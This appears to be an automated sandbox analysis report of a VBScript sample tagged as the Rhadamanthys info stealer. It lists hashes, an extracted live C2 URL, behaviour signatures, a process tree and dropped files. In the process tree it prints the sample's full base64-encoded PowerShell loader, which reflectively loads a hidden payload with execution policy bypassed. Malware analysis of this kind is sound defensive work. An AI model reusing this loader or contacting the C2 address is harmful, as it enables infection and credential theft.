Overview

overview

10

Static

static

1

rsDymE.vbs

windows10-2004-x64

10

Resubmissions

03/04/2025, 17:51

250403-we7l8stm14 10

03/04/2025, 17:11

250403-vqrjqazxb1 10

13/09/2024, 07:24

240913-h8ddla1dnj 10

Analysis

  • max time kernel
    385s
  • max time network
    386s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/04/2025, 17:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rsDymE.vbs

  • Size

    506KB

  • MD5

    7fba6758ee02d6fbd69db7bb5de82029

  • SHA1

    7c759c4a7681da6e916d8dd80ecfb125f4bf49f5

  • SHA256

    8bed27f5b5a1f3fee9076396dfa556be72ce444e1b0bf1ee536d716939c3a974

  • SHA512

    15c49c436bf5ed535f646f263e70e80f47de620a553a9f7a8a88482385eec5812970fdc0f69b915efa6006a58b16fbf47980f2fa34f54344cbe77ac28cc75722

  • SSDEEP

    12288:0KaH9AkQqyuC+4MXBRNAIPyLKhaDw7JZJGjdbS4VZZ4Ph:89AkJyd+XXBzAIKOUU7Foxn4p

Score
10/10
rhadamanthysdiscoveryexecutionstealer

Malware Config

Extracted

Family

rhadamanthys

C2

https://deadmunky.nl:5403/68efc67ee981034e6b329438/h7bgh43h.758up

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Drops desktop.ini file(s) 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2568
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5280
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rsDymE.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\rsDymE.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2056
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgInJzRHltRS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\rsDymE.ps1' -Encoding UTF8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\rsDymE.ps1"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4704
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:884
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 640
              5⤵
              • Program crash
              PID:4572
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 648
              5⤵
              • Program crash
              PID:4624
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:5604
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 884 -ip 884
        1⤵
          PID:5372
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 884 -ip 884
          1⤵
            PID:3224
          • C:\Windows\system32\OpenWith.exe
            C:\Windows\system32\OpenWith.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4832
            • C:\Windows\System32\notepad.exe
              "C:\Windows\System32\notepad.exe" "C:\Users\Admin\rsDymE.ps1"
              2⤵
              • Opens file in notepad (likely ransom note)
              PID:5724
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\PowerShell_ISE.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\PowerShell_ISE.exe"
            1⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4804
          • C:\Windows\SysWOW64\DllHost.exe
            C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            1⤵
            • System Location Discovery: System Language Discovery
            PID:3316
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3980
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              2⤵
              • Drops desktop.ini file(s)
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3156
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27099 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {05e06075-7f05-43e8-b1c0-634ae099866b} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                3⤵
                  PID:444
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2472 -prefsLen 27135 -prefMapHandle 2476 -prefMapSize 270279 -ipcHandle 2340 -initialChannelId {178ac35f-fca4-433c-9e05-2caca7a03345} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                  3⤵
                    PID:2380
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3740 -prefsLen 27276 -prefMapHandle 3744 -prefMapSize 270279 -jsInitHandle 3748 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3752 -initialChannelId {c6eeab9b-979c-46e1-a491-b9e397b77874} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                    3⤵
                    • Checks processor information in registry
                    PID:3316
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3900 -prefsLen 27276 -prefMapHandle 3904 -prefMapSize 270279 -ipcHandle 4004 -initialChannelId {9c78e560-1f00-40a8-9fbe-9ccdf2c8a945} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                    3⤵
                      PID:4512
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2948 -prefsLen 34775 -prefMapHandle 2484 -prefMapSize 270279 -jsInitHandle 3052 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3084 -initialChannelId {259fffed-5447-499c-95f4-65019fc8cf70} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                      3⤵
                      • Checks processor information in registry
                      PID:3284
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 1364 -prefsLen 34824 -prefMapHandle 1368 -prefMapSize 270279 -ipcHandle 4968 -initialChannelId {10ba58e5-0d8e-4831-afc8-8dcc1dfc6bd0} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                      3⤵
                      • Checks processor information in registry
                      PID:1476
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5248 -prefsLen 32952 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5268 -initialChannelId {b86e2c36-a497-4a8e-807e-d4a9d85ffca5} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                      3⤵
                      • Checks processor information in registry
                      PID:5616
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5512 -prefsLen 32952 -prefMapHandle 5516 -prefMapSize 270279 -jsInitHandle 5520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5528 -initialChannelId {c9bf2980-cc8d-4369-aed4-fa6a495f6bc2} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                      3⤵
                      • Checks processor information in registry
                      PID:5364
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5700 -prefsLen 32952 -prefMapHandle 5704 -prefMapSize 270279 -jsInitHandle 5708 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5716 -initialChannelId {73049ec2-81e5-4edb-b733-ccf4d8857e31} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                      3⤵
                      • Checks processor information in registry
                      PID:3388
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6344 -prefsLen 33031 -prefMapHandle 2956 -prefMapSize 270279 -jsInitHandle 6352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6208 -initialChannelId {f9f7b5ed-a0f2-44b2-8b22-97ed5cd54fc1} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
                      3⤵
                      • Checks processor information in registry
                      PID:2232
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6604 -prefsLen 33031 -prefMapHandle 6608 -prefMapSize 270279 -jsInitHandle 6612 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6532 -initialChannelId {90e97203-6bed-4706-900a-13e2e15c8cc6} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
                      3⤵
                      • Checks processor information in registry
                      PID:1784
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6636 -prefsLen 33031 -prefMapHandle 6604 -prefMapSize 270279 -jsInitHandle 6608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6532 -initialChannelId {b9ae4900-5d41-49bd-8276-ffde7824e893} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab
                      3⤵
                      • Checks processor information in registry
                      PID:4380
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 4 -prefsHandle 6920 -prefsLen 35143 -prefMapHandle 3104 -prefMapSize 270279 -ipcHandle 6928 -initialChannelId {a2bd6ae3-c826-494f-b9ed-9348a55b6e13} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 utility
                      3⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:4568
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5592 -prefsLen 36502 -prefMapHandle 5564 -prefMapSize 270279 -jsInitHandle 5640 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5652 -initialChannelId {54ee055e-94be-453a-b48c-30a02192d8a4} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab
                      3⤵
                      • Checks processor information in registry
                      PID:3104
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 4 -prefsHandle 7412 -prefsLen 39591 -prefMapHandle 2852 -prefMapSize 270279 -ipcHandle 7416 -initialChannelId {e16805cc-3644-483e-8ab6-2eb331165b4e} -parentPid 3156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3156" -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 utility
                      3⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:5164

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                  Filesize

                  1KB

                  MD5

                  4280e36a29fa31c01e4d8b2ba726a0d8

                  SHA1

                  c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                  SHA256

                  e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                  SHA512

                  494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  16KB

                  MD5

                  37b2a55fa6d8300da811d5c67257bf60

                  SHA1

                  9ff319296c426d70b2dad680fd0d63b5479c619a

                  SHA256

                  57be952810fad7d9424762847394d6d0fdb914ea82d931e74daf3e6a3ab01e0b

                  SHA512

                  7b07144d9c29bc6950291ffa1994fe14025dad2af889d21ebe69f7c55be462ca75f7f2e179040098c539abbaae4795b5087276b632e60f6f8c43bfaf27c0c4f3

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4804.xml
                  Filesize

                  786B

                  MD5

                  289c31904ffb607642537f95fc5903b7

                  SHA1

                  1fee191132132891c40cad49654651a07f9cdc88

                  SHA256

                  f069e3dff1ae616b6531e900b93a9bdc6ca8527c50bbb62864e6c5d3f3440dd4

                  SHA512

                  ee6190a4f24dad98b437ac01ba8def92b911ad75997665972fb0c7b8a1976e636563621c8de182affdd8fc364df6f982af6836c3f0392fff80746d49b58958ba

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4804.xml~RFe5bb5b0.TMP
                  Filesize

                  785B

                  MD5

                  9162c61f25f91311729d39f41958c545

                  SHA1

                  a08a976454786ec215a4894234c6ce379b007186

                  SHA256

                  be24d7ded10c34c4bd951bbfd018d5263ec2dd9ace8c5a70e1bdfff53de262dd

                  SHA512

                  ae244bfd022deb4839fb30628b4aaabf0a9f4cdb16fc94c53563f5cabc6bfdd01768753fb2b5548c55fdcb910416966494aaf1e745a5cedb29c2539e8e8a0fe6

                  Download Submit

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\activity-stream.discovery_stream.json.tmp
                  Filesize

                  23KB

                  MD5

                  f341592eed7aa4d7e6dc7845cf7240c5

                  SHA1

                  138dfcda881820fcf66a851ffd7715f309ef5be4

                  SHA256

                  66524d5ac6d3f4a44b5ea2d84e6814e85e5284cf32b3c79c8a3e8528b08e07ee

                  SHA512

                  11f367bf2b273904460f9d6ba7208ba7133b419307d341d21a4392af23c9f80752032bbf5be3ed0590fd17e9b4cbbbdfd6c5529431d52a4b9328c6b981f8e6dc

                  Download Submit

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\cache2\entries\2FC82301C5CFEF1E8CDECE75F6731A62C63BC6D8
                  Filesize

                  225KB

                  MD5

                  97fecd8ad1fb7a8ac7f9563f8dfb14d6

                  SHA1

                  70322d5cad704da17adc5d3758986c67948679c9

                  SHA256

                  ebc6b2fcf2c299c3151e7e886ab8bb8c86a771220971b97a5408d43a850401b8

                  SHA512

                  63d434da273b597f721de5248e5e83564886a5d55301d8677acc103c387dfb5cbc083aa428b9ad3df57d28bd5a2fbd439a239d3b89c54f3d5b122af740a693f1

                  Download Submit

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
                  Filesize

                  13KB

                  MD5

                  a80ab2c750c8e52e4dc08992a72547ab

                  SHA1

                  e0dfacc80bce33f54b935c48190640126e663cf5

                  SHA256

                  5000b65e824a9a13ef6366173457b1d40064d7885c680e18f47d2bdee2eb7c79

                  SHA512

                  f081173278735dbfeb93c3dc3b32c341532e23ce0dc581cb03d86718d5f7ba28394ac64be487c81a45a2ec935bd72c522be92093346514cbe3adde8231e46222

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxqbntn5.kax.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                  Filesize

                  11KB

                  MD5

                  25e8156b7f7ca8dad999ee2b93a32b71

                  SHA1

                  db587e9e9559b433cee57435cb97a83963659430

                  SHA256

                  ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                  SHA512

                  1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                  Filesize

                  502KB

                  MD5

                  e690f995973164fe425f76589b1be2d9

                  SHA1

                  e947c4dad203aab37a003194dddc7980c74fa712

                  SHA256

                  87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                  SHA512

                  77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                  Filesize

                  14.0MB

                  MD5

                  bcceccab13375513a6e8ab48e7b63496

                  SHA1

                  63d8a68cf562424d3fc3be1297d83f8247e24142

                  SHA256

                  a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

                  SHA512

                  d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\AlternateServices.bin
                  Filesize

                  18KB

                  MD5

                  5cc453fe14e2a694d7b22d384fb3a609

                  SHA1

                  fa71b0015aeb28f800bb5cbb05c287dca6ee659e

                  SHA256

                  1f52911baf1b94c895907e0a136f006cda5b00f5f9297eb8e4f88a113eff85b4

                  SHA512

                  0be9e23c72080639990e808d348fd4e17e4521a12ddafd03fb2bcc972e466b14189189a4feb6fc406308a056cd3cd5c2563d14fc5cc7b510cc85861664121895

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\AlternateServices.bin
                  Filesize

                  6KB

                  MD5

                  eb86fff8f4cd4c0c817fc924ef7235c2

                  SHA1

                  5456e80ffabfb3e3709b7674456efbc3baa7d96d

                  SHA256

                  74ef54b94dc267e14c0c8237724af38fafbdf0547a0b820639569bb471fa84ee

                  SHA512

                  056b83a6f27f185d2697e3d5d85266f30e68129265e731954044c13443874ebefdd39da16d248f03cd593399f4e5d8b6344b3501e66ce5c17c71f1f64213f634

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.tmp
                  Filesize

                  3KB

                  MD5

                  d5d1bb3ce863e97e7f0e24b0ab1a8197

                  SHA1

                  af557061cbc61d606dc7600a26aa7580cd34ccac

                  SHA256

                  383f2c1731fac767b0fa720a4141a5bebdf4429776c5d5cca7e281344541999d

                  SHA512

                  3c4dc5e8bc2a2d7291e1ea6522617e707fdd3920986a6f4c2d948d23e2a7ea300af89897b6413588e7f7372b8ee6f44afc45af7472777d9a4d90fffc25f43251

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.tmp
                  Filesize

                  103KB

